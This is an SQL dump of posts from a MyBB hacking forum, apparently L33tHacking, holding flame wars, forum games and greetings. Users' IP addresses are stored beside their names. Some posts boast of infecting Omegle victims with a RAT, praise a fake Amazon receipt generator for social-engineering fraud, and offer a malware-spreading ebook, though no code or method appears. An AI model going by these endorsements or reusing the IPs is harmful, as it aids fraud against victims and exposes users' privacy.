'0'); INSERT INTO mybb_posts VALUES('1206', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346125260', 'Actually if you had never joined the forum this would not have happend so technically this is your fault.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '10bf463a4d65c3a346f02bf6d6edfaef', '0', '0'); INSERT INTO mybb_posts VALUES('1207', '265', '1206', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346125875', '[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\']\r\nActually if you had never joined the forum this would not have happend so technically this is your fault.\r\n[/quote]\r\n\r\n\r\nOh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ea4dd972c8a6469846a3b8962a1bf48', '0', '0'); INSERT INTO mybb_posts VALUES('1208', '265', '1207', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346125929', '[quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\']\r\n[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\']\r\nActually if you had never joined the forum this would not have happend so technically this is your fault.\r\n[/quote]\r\n\r\n\r\nOh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...\r\n[/quote]\r\nLol still talking big xD haha\n[hr]\nAnyway you do not know the shit I am going throu only joker knows.', '173.206.129.78', '-1378975410', '0', '0', '2', '1346126484', '1', '03a266f71248bd163e56997b0af4ea8e', '0', '1346126484'); INSERT INTO mybb_posts VALUES('1209', '265', '1184', '3', 'RE: Apathy Demoted', '0', '55', 'Baws', '1346126713', 'I\'m not sure what is going on, but you guys @Ipod and Apathy, can take this to pm.\n\nAnyways, I\'ve seen Apathy couple times around but yeah I guess that sucks for him.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '2ec1d143ce576fbecc072470e5651fb2', '0', '0'); INSERT INTO mybb_posts VALUES('1210', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '55', 'Baws', '1346126821', 'I see good group suggestions, good luck everyone.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '3efb78ebb6b8a2b0469dd35e694777e6', '0', '0'); INSERT INTO mybb_posts VALUES('1211', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346126869', 'So that I can win this game, now please close it.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b8f08eedb52b69d3b8bdaca1b2faabe5', '0', '0'); INSERT INTO mybb_posts VALUES('1212', '269', '0', '3', 'Group Image not working', '0', '55', 'Baws', '1346127095', 'I noticed the only group\'s image that won\'t work is super moderator.\r\n\r\n[URL=http://img225.imageshack.us/i/capturehal.png/][IMG]http://img225.imageshack.us/img225/3200/capturehal.png[/IMG][/URL]', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '6b45bfe94082ec1dcf5b1c21a30225f4', '0', '0'); INSERT INTO mybb_posts VALUES('1213', '3', '7', '19', 'RE: Official Site Rules', '0', '55', 'Baws', '1346127150', 'Agreed with Timmy, I think you should lower the font.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'bb710eac78ec2d9263a11990d41497e4', '0', '0'); INSERT INTO mybb_posts VALUES('1214', '238', '1157', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346127219', '[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\']\r\n[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\']\r\n[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\']\r\nBanned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.\r\n[/quote]\r\n\r\nBanned for me not noticin that. So fuck you :)\r\n[/quote]\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)\r\n[/quote]\r\n\r\nBanned for having so many awards, and being a noob.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '5e33132d7c61ab4da60a303af284cdec', '0', '0'); INSERT INTO mybb_posts VALUES('1215', '265', '1208', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346127350', '[quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\']\r\n[quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\']\r\n[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\']\r\nActually if you had never joined the forum this would not have happend so technically this is your fault.\r\n[/quote]\r\n\r\n\r\nOh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...\r\n[/quote]\r\nLol still talking big xD haha\r\n[hr]\r\nAnyway you do not know the shit I am going throu only joker knows.\r\n[/quote]\r\n\r\nThat\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9d5ccf8b4a5a90806e2980d6299e88f', '0', '0'); INSERT INTO mybb_posts VALUES('1216', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346127397', 'What do you have copy/pasted right now? without changing it!\n\nmines this\nhttp://www.dell.com/us/p/alienware-x51/pd.aspx\n\nShowing my brother a small pc for his new apartment that\'s small with a good payment plan', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'faad708832baa6c8a6a520e4354b3a21', '0', '0'); INSERT INTO mybb_posts VALUES('1217', '265', '1215', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346127737', '[quote=\'iTzIpod\' pid=\'1215\' dateline=\'1346127350\']\r\n[quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\']\r\n[quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\']\r\n[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\']\r\nActually if you had never joined the forum this would not have happend so technically this is your fault.\r\n[/quote]\r\n\r\n\r\nOh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...\r\n[/quote]\r\nLol still talking big xD haha\r\n[hr]\r\nAnyway you do not know the shit I am going throu only joker knows.\r\n[/quote]\r\n\r\nThat\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts.\r\n[/quote]\r\n\r\nLOL still taking like a big shot. Like how HQ you are right?', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '422f970a7d2999c3e70b67ffe1763358', '0', '0'); INSERT INTO mybb_posts VALUES('1218', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346128947', 'I am the champ so there. dfg', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '1c1fca758e50a1ff3759f10f66b06771', '0', '0'); INSERT INTO mybb_posts VALUES('1219', '249', '1211', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346129063', '[quote=\'Baws\' pid=\'1211\' dateline=\'1346126869\']\r\nSo that I can win this game, now please close it.\r\n[/quote]\r\n\r\nNah. I\'d rather not :) I want to win. And I did!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8a4c21214f8100a069d0124a37e6be01', '0', '0'); INSERT INTO mybb_posts VALUES('1220', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '2', 'Apathy', '1346129114', 'No I am going to win so there.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '060dfc633c22916f18d80b21f91d577d', '0', '0'); INSERT INTO mybb_posts VALUES('1221', '238', '1214', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346129404', '[quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\']\r\n[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\']\r\n[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\']\r\n[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\']\r\nBanned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.\r\n[/quote]\r\n\r\nBanned for me not noticin that. So fuck you :)\r\n[/quote]\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)\r\n[/quote]\r\n\r\nBanned for having so many awards, and being a noob.\r\n[/quote]\r\n\r\nBanned for calling me a noob. (How am I a noob)?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dbb4b20edd6fcd9278e7b78e5a7a9133', '0', '0'); INSERT INTO mybb_posts VALUES('1222', '190', '1216', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346129727', '[quote=\'Baws\' pid=\'1216\' dateline=\'1346127397\']\r\nWhat do you have copy/pasted right now? without changing it!\r\n\r\nmines this\r\nhttp://www.dell.com/us/p/alienware-x51/pd.aspx\r\n\r\nShowing my brother a small pc for his new apartment that\'s small with a good payment plan\r\n[/quote]\r\n\r\nI died. Lol.\r\n\r\n\r\n\r\n\r\n\r\n\r\nI copied >_<~\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6937a4ec22286d0fed19de5423b8986b', '0', '0'); INSERT INTO mybb_posts VALUES('1223', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346130001', 'I died. Lol.\n\n\n\n\n\n\nI copied >_<~\"?', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '206e892967f4c82bf4776f2b8dfbcfd4', '0', '0'); INSERT INTO mybb_posts VALUES('1224', '238', '1221', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346130192', '[quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\']\r\n[quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\']\r\n[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\']\r\n[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\']\r\n[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\']\r\nBanned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.\r\n[/quote]\r\n\r\nBanned for me not noticin that. So fuck you :)\r\n[/quote]\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)\r\n[/quote]\r\n\r\nBanned for having so many awards, and being a noob.\r\n[/quote]\r\n\r\nBanned for calling me a noob. (How am I a noob)?\r\n[/quote]\r\n\r\nBanned for having a bigger dick than me. :/', '98.176.49.100', '1655714148', '0', '0', '82', '1346161265', '1', '0e69211f7182b683dbaa4d4e5e192a9c', '0', '1346161265'); INSERT INTO mybb_posts VALUES('1225', '269', '1212', '3', 'RE: Group Image not working', '0', '82', 'iTzIpod', '1346130233', 't3h jok3r probably made a mistake. But hopefully this will be fixed tomorrow - or soon!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '844c6a6409cb4fbc9e571fd61680b81d', '0', '0'); INSERT INTO mybb_posts VALUES('1226', '265', '1217', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346130792', '[quote=\'Apathy\' pid=\'1217\' dateline=\'1346127737\']\r\n[quote=\'iTzIpod\' pid=\'1215\' dateline=\'1346127350\']\r\n[quote=\'Apathy\' pid=\'1208\' dateline=\'1346125929\']\r\n[quote=\'iTzIpod\' pid=\'1207\' dateline=\'1346125875\']\r\n[quote=\'Apathy\' pid=\'1206\' dateline=\'1346125260\']\r\nActually if you had never joined the forum this would not have happend so technically this is your fault.\r\n[/quote]\r\n\r\n\r\nOh? Well if I\'m not mistaken, if you didn\'t make LQ posts, treated me with attittude, and start fucking with me,all of this wouldn\'t happen. Why don\'t you just get over it and spam the forum with more LQ posts and give that attitude you are giving me and t3h jok3r to more members on this forum and lets see what else you lose...\r\n[/quote]\r\nLol still talking big xD haha\r\n[hr]\r\nAnyway you do not know the shit I am going throu only joker knows.\r\n[/quote]\r\n\r\nThat\'s good for you. I didn\'t ask for your opinion about what you are going too. Whatever it is you are going through, I hope it is puberty. You must put more effort in your posts.\r\n[/quote]\r\n\r\nLOL still taking like a big shot. Like how HQ you are right?\r\n[/quote]\r\n\r\nI\'m not calling myself HQ or LQ. I try to be HQ. You are LQ. I remember seing you post posts like \"lol yay\" or \"cool\" etc. And you broke on of LH\'s rules.\n[hr]\nIf you want to start a bitch war, go rifgt ahead and PM me..', '24.212.197.164', '416597412', '1', '0', '82', '1346130962', '1', 'a4f7dc5fa2eb7f66af7e7de30b9da853', '0', '1346130962'); INSERT INTO mybb_posts VALUES('1227', '190', '1223', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346131261', '[quote=\'Baws\' pid=\'1223\' dateline=\'1346130001\']\r\nI died. Lol.\r\n\r\n\r\n\r\n\r\n\r\n\r\nI copied >_<~\"?\r\n[/quote]\r\n\r\nThat\'s not fair :o \r\n\r\n\r\nCopied: Roflcopter', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f0800e599b1e91aae15b15bdff373ccf', '0', '0'); INSERT INTO mybb_posts VALUES('1228', '270', '0', '7', 'Hi everyone', '0', '61', 'NXK', '1346136280', 'I haven\'t really been active due to college, I\'m just starting so iv had alot of paper work n things iv needed to do. So iv been busy. I\'ll try to remain HQ and release more programs/tuts soon.\r\n\r\nYes this is me saying sorry at 2:35 am. Get over it.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '3c7d86af1675e765757958393ea632db', '0', '0'); INSERT INTO mybb_posts VALUES('1229', '269', '1212', '3', 'RE: Group Image not working', '0', '55', 'Baws', '1346141059', 'Alright I\'m glad I pointed this out. :)', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '92812134262ae1ee1c161f6c2ef6301f', '0', '0'); INSERT INTO mybb_posts VALUES('1230', '271', '0', '53', 'Minecraft/Rsps coding', '0', '67', 'HoverCatz', '1346143024', '[color=#FF0000][b]Hey everyone. :)[/b]\nIm here to tell you guys that i may be offering your coding needs. Whether it\'s a Mc plugin or a Rsps, does not matter. [/color]\n\n[color=#32CD32][b]My skills: [/b]5 years with Java coding (Old -> New Rsps, Mc servers, Other java game related stuff)[/color]\n\n[color=#FF1493]Just post below if you have Any questions, or want any coding done :P[/color]\n\nEdit: Prices depends on how much work there is :)', '178.74.56.137', '-1303758711', '1', '0', '67', '1346169944', '1', 'd4bc9eb43d0263d334904ffbdc1d10b3', '0', '1346169944'); INSERT INTO mybb_posts VALUES('1231', '265', '1184', '3', 'RE: Apathy Demoted', '0', '67', 'HoverCatz', '1346143414', 'Seriously? PM eachother now lol', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '400f445f1ee6e47bb0e7125a4e862abc', '0', '0'); INSERT INTO mybb_posts VALUES('1232', '191', '666', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346160405', '@sirchamp Yes its made in Gamemaker. Its the exactly same gui as when u Build and run the game. Even the Loading box is the same. Dont lie to me. I know what im talking about', '178.74.56.137', '-1303758711', '1', '0', '67', '1346160604', '1', '5981d4947bec227debe1cd5ae9a1de60', '0', '1346160604'); INSERT INTO mybb_posts VALUES('1233', '270', '1228', '7', 'RE: Hi everyone', '0', '82', 'iTzIpod', '1346160715', '[quote=\'NXK\' pid=\'1228\' dateline=\'1346136280\']\r\nI haven\'t really been active due to college, I\'m just starting so iv had alot of paper work n things iv needed to do. So iv been busy. I\'ll try to remain HQ and release more programs/tuts soon.\r\n\r\nYes this is me saying sorry at 2:35 am. Get over it.\r\n[/quote]\r\n\r\nGood luck in college dude. Don\'t worry, there is a reason why there are 2 Mods.\r\nHope you can visit in the future. Also, I got school myself aswell. In 7 days to be exact..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b4ca57f842cc30873a20ddcd4b53bf65', '0', '0'); INSERT INTO mybb_posts VALUES('1234', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346161013', 'It is official guys... I won', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7c9643ac545b44a82b537b3d400d4d3d', '0', '0'); INSERT INTO mybb_posts VALUES('1235', '238', '1224', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346161418', '[quote=\'Baws\' pid=\'1224\' dateline=\'1346130192\']\r\n[quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\']\r\n[quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\']\r\n[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\']\r\n[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\']\r\n\r\nBanned for me not noticin that. So fuck you :)\r\n[/quote]\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)\r\n[/quote]\r\n\r\nBanned for having so many awards, and being a noob.\r\n[/quote]\r\n\r\nBanned for calling me a noob. (How am I a noob)?\r\n[/quote]\r\n\r\nBanned for having a bigger dick than me. :/\r\n[/quote]\r\n\r\nUh. Alrighty then.Banned for having a smaller dick than me..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7d589c842342f3478bd409da5cfc64d7', '0', '0'); INSERT INTO mybb_posts VALUES('1236', '212', '1210', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346162969', '[quote=\'Baws\' pid=\'1210\' dateline=\'1346126821\']\r\nI see good group suggestions, good luck everyone.\r\n[/quote]\r\n\r\nThanks Baws. If you need a group, let me know. You meet the requirements for mine. Just that I am waiting for it to be Official. If it ever is.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77951ec4d43db8866d42ff897849aefd', '0', '0'); INSERT INTO mybb_posts VALUES('1237', '271', '1230', '53', 'RE: Minecraft/Rsps coding', '0', '82', 'iTzIpod', '1346163123', 'My friend owns a RSPS called Deznation. You can check it out at DezNation.ca he might need some help coding stuff. I will inform him =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6d12fe648b366cef8e67eba82d30380', '0', '0'); INSERT INTO mybb_posts VALUES('1238', '262', '1171', '43', 'RE: Amazon Receipt Generator V.2', '0', '82', 'iTzIpod', '1346163204', 'I had this. But then when I got the receipt, I had to photoshop the copyright thing because it said 1996-2010 instead of 2012.\n[hr]\nOT: Nice release. It will make SEing more easier and faster hopefully.', '24.212.197.164', '416597412', '1', '0', '82', '1346163244', '1', 'f6fc2f472c51e653fd345557bf793c6f', '0', '1346163244'); INSERT INTO mybb_posts VALUES('1239', '269', '1229', '3', 'RE: Group Image not working', '0', '82', 'iTzIpod', '1346163291', '[quote=\'Baws\' pid=\'1229\' dateline=\'1346141059\']\r\nAlright I\'m glad I pointed this out. :)\r\n[/quote]\r\n\r\nI just want to see the Super Moderator Userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ab219ad5e9fec2486d4388ff4c3c5c3', '0', '0'); INSERT INTO mybb_posts VALUES('1240', '269', '1212', '3', 'RE: Group Image not working', '0', '1', 't3h jok3r', '1346164105', 'Whoops. Thanks for letting me know, last night I was having a cache problem so couldn\'t see the changes when they were updated. \n\nThanks for reporting.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', 'ce69131379b910d22cb358793471f0ec', '0', '0'); INSERT INTO mybb_posts VALUES('1241', '199', '714', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '1', 't3h jok3r', '1346164548', 'This is a really good guide on protecting your identity online.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', '2c156b6ad334100ab2fa4dcbc8087dac', '0', '0'); INSERT INTO mybb_posts VALUES('1242', '268', '1201', '49', 'RE: [Suggestion] Forum News Section', '0', '1', 't3h jok3r', '1346165372', '[quote=\'Apathy\' pid=\'1201\' dateline=\'1346122894\']\r\nWhy would this be needed as there is like 5 active people?\r\n[/quote]\r\n\r\n129 Registered Users\r\n[b]17 Active Users[/b]\r\n4 Registrations Today\r\n2 Awaiting Activation\r\n\r\nSeems like you never logged into the ACP.', '41.151.157.76', '697802060', '1', '0', '0', '0', '1', 'ff56f265e1c493fa33017658de2e4a88', '0', '0'); INSERT INTO mybb_posts VALUES('1243', '272', '0', '4', 'Hello, I\'m Dreamer', '0', '138', 'Dreamer', '1346169102', '[align=center][b]Hello, LH\r\n\r\nI\'m Dreamer.\r\n\r\nIf you\'re or were into the Xbox Live modding world, you would know me as DarkDreamer. Well, I\'ve retired with that and I\'m on to new and better things. Even when I was doing my thing on the xbox, I was still practicing SE and Human Manipulation. I would practice it on Omegle to get victims for my RAT. Well, I\'ve only gotten better at it. This is about my 3rd year doing so, and I\'m glad to be a part of a community that\'s almost completely based on it.\r\n\r\nI hope to do well here. If anyone has any questions or needs help, feel free to shoot me a PM.[/b][/align]', '71.207.111.91', '1204776795', '0', '0', '0', '0', '1', 'f8e61a287e8012b75ff48703f13bb011', '0', '0'); INSERT INTO mybb_posts VALUES('1244', '232', '949', '50', 'RE: Triple H', '0', '20', 'JakeUS', '1346169647', 'Closing thread.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '966b5018285448322ce35b30a558ddd5', '0', '0'); INSERT INTO mybb_posts VALUES('1245', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '82', 'iTzIpod', '1346169725', 'Hello Dreamer. Welcome to L33tHacking.\nOnce a L33t, Always a L33t.\nI\'m glad you joined. Please be active and stick to the rules.\n\nThanks for joining L33thacking.com', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8a4e4782ebfd3946620bdd2646dd354', '0', '0'); INSERT INTO mybb_posts VALUES('1246', '190', '665', '56', 'RE: Copy and paste game', '0', '67', 'HoverCatz', '1346169833', 'Play IW4M (Modern Warfare 2)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '6e96f0581dd3f808c1a3e082d71a062f', '0', '0'); INSERT INTO mybb_posts VALUES('1247', '271', '1230', '53', 'RE: Minecraft/Rsps coding', '0', '67', 'HoverCatz', '1346170143', 'Tried to connect with the client, it wont connect to the server. Cant login at all', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'e83b3a735a9e2f8ed90695f2da9ca86b', '0', '0'); INSERT INTO mybb_posts VALUES('1248', '199', '714', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '67', 'HoverCatz', '1346170841', 'Nice :) But its Copy pasted.', '178.74.56.137', '-1303758711', '1', '0', '67', '1346171034', '1', '4b6b854821ed605e8b622218d56f3253', '0', '1346171034'); INSERT INTO mybb_posts VALUES('1249', '273', '0', '59', '????Free Spreading Complete Ebook????', '0', '138', 'Dreamer', '1346171506', '[align=center][b]Okay, I\'m going to make this short and to the point.\r\n\r\nIf you would like the method, just comment on here.\r\n\r\nThis is for all members. I know a lot of people have posted these, but why not one more right?\r\n\r\nEnjoy, guys![/b][/align]', '71.207.111.91', '1204776795', '1', '0', '0', '0', '1', '9c82ab4e6f4f3a0d4500bec2f9b16925', '0', '0'); INSERT INTO mybb_posts VALUES('1250', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '67', 'HoverCatz', '1346171686', 'May i have this? Thanks in advance :3\n\nEdit: Oh, btw l33thacking is kinda meant to be without any \"comment or Pm to get link\" :P', '178.74.56.137', '-1303758711', '1', '0', '67', '1346171733', '1', '43e966b295c2b57e26754f8070aee555', '0', '1346171733'); INSERT INTO mybb_posts VALUES('1251', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346175402', '[color=transparent]l33thacking.com[/color]\nto this message here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c92151a196a8175feac99dd623fcfb50', '0', '0'); INSERT INTO mybb_posts VALUES('1252', '248', '1056', '16', 'RE: [Free] [EBook] How to SE a 3DS', '0', '116', '@SSASIN', '1346176198', 'Going to be trying this as we speak. Hope i can SE dem', '2.98.231.234', '40036330', '0', '0', '0', '0', '1', 'e2a0f2706a984aa56558ccca32016edf', '0', '0'); INSERT INTO mybb_posts VALUES('1253', '191', '666', '15', 'RE: ProDos v1.0', '0', '53', 'sirchamp', '1346179556', 'You can make the exact same gui with c++. Can you code in c++?I dont think so..', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '94fd0903e31c2bb69a4afd5590b14577', '0', '0'); INSERT INTO mybb_posts VALUES('1254', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346181317', 'That\'s not fair :o \n\n\nCopied: Roflcopter', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'f0193bb8f186b8ec2c8f311c99aa5339', '0', '0'); INSERT INTO mybb_posts VALUES('1255', '199', '1248', '25', 'RE: [Guide]How to protect your identity[Well-detailed]', '0', '55', 'Baws', '1346181456', '[quote=\'HoverCatz\' pid=\'1248\' dateline=\'1346170841\']\r\nNice :) But its Copy pasted.\r\n[/quote]\r\n\r\nNice but I think HoverCatz is right. :P', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '82a21567d1928fe22c63eff179af7f5e', '0', '0'); INSERT INTO mybb_posts VALUES('1256', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '55', 'Baws', '1346181523', 'Welcome here, you seem pretty badass!', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '903aedbed1301e3de7eef9ba53257682', '0', '0'); INSERT INTO mybb_posts VALUES('1257', '238', '1235', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346181604', '[quote=\'iTzIpod\' pid=\'1235\' dateline=\'1346161418\']\r\n[quote=\'Baws\' pid=\'1224\' dateline=\'1346130192\']\r\n[quote=\'iTzIpod\' pid=\'1221\' dateline=\'1346129404\']\r\n[quote=\'Baws\' pid=\'1214\' dateline=\'1346127219\']\r\n[quote=\'iTzIpod\' pid=\'1157\' dateline=\'1346096690\']\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)\r\n[/quote]\r\n\r\nBanned for having so many awards, and being a noob.\r\n[/quote]\r\n\r\nBanned for calling me a noob. (How am I a noob)?\r\n[/quote]\r\n\r\nBanned for having a bigger dick than me. :/\r\n[/quote]\r\n\r\nUh. Alrighty then.Banned for having a smaller dick than me..\r\n[/quote]\r\n\r\nBanned for having a small chat with you mom and she let you know I gotta smaller dick.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'd02f1a4458e973c0eb5ba74cc7230cfd', '0', '0'); INSERT INTO mybb_posts VALUES('1258', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1346181769', '[Monday, August 27, 2012 2:00 PM]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0dd0e38522ecc8bce295dda67b5a511a', '0', '0'); INSERT INTO mybb_posts VALUES('1259', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346181809', 'Banned for quoting me. Enjoy your ban! ^__^', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7102640f40cf8674b3cb259e896fe4cb', '0', '0'); INSERT INTO mybb_posts VALUES('1260', '238', '1259', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346182662', '[quote=\'iTzIpod\' pid=\'1259\' dateline=\'1346181809\']\r\nBanned for quoting me. Enjoy your ban! ^__^\r\n[/quote]\r\n\r\nBanned for not quoting me. Enjoy your ban! ^__^', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '87a3317e324ea85cdc78476848b89e50', '0', '0'); INSERT INTO mybb_posts VALUES('1261', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346183038', 'Banned for being Elite.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99fac0e032a0906cb96753f537895af0', '0', '0'); INSERT INTO mybb_posts VALUES('1262', '238', '1261', '56', 'RE: Ban the user above you', '0', '55', 'Baws', '1346183503', '[quote=\'iTzIpod\' pid=\'1261\' dateline=\'1346183038\']\r\nBanned for being Elite.\r\n[/quote]\r\n\r\nBanned for being LH Mod.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'b3f418e290e3d2c3feed7c2c1b453c8b', '0', '0'); INSERT INTO mybb_posts VALUES('1263', '190', '665', '56', 'RE: Copy and paste game', '0', '55', 'Baws', '1346183549', 'l33thacking.com\nto this message here.', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '770aace13186135fabe6baebecbca5ec', '0', '0'); INSERT INTO mybb_posts VALUES('1264', '235', '980', '48', 'RE: Experiences of MOD', '0', '61', 'NXK', '1346184038', 'It\'s good. I feel like I can actually do something for this community.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'b747d2be90e138016b4651e536505676', '0', '0'); INSERT INTO mybb_posts VALUES('1265', '272', '1243', '4', 'RE: Hello, I\'m Dreamer', '0', '1', 't3h jok3r', '1346187355', 'Welcome to L33THacking.\n\nHope you enjoy your stay on LH.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 'cac7565dc4fe4854fd3e5bf5f673b233', '0', '0'); INSERT INTO mybb_posts VALUES('1266', '273', '1249', '59', 'RE: ????Free Spreading Complete Ebook????', '0', '1', 't3h jok3r', '1346187509', 'LH is not a post here and PM me website like HF, but we DO allow post here only. It\'s just for the starting because we require activity and need to boost up our stats.', '41.174.2.156', '699269788', '1', '0', '0', '0', '1', 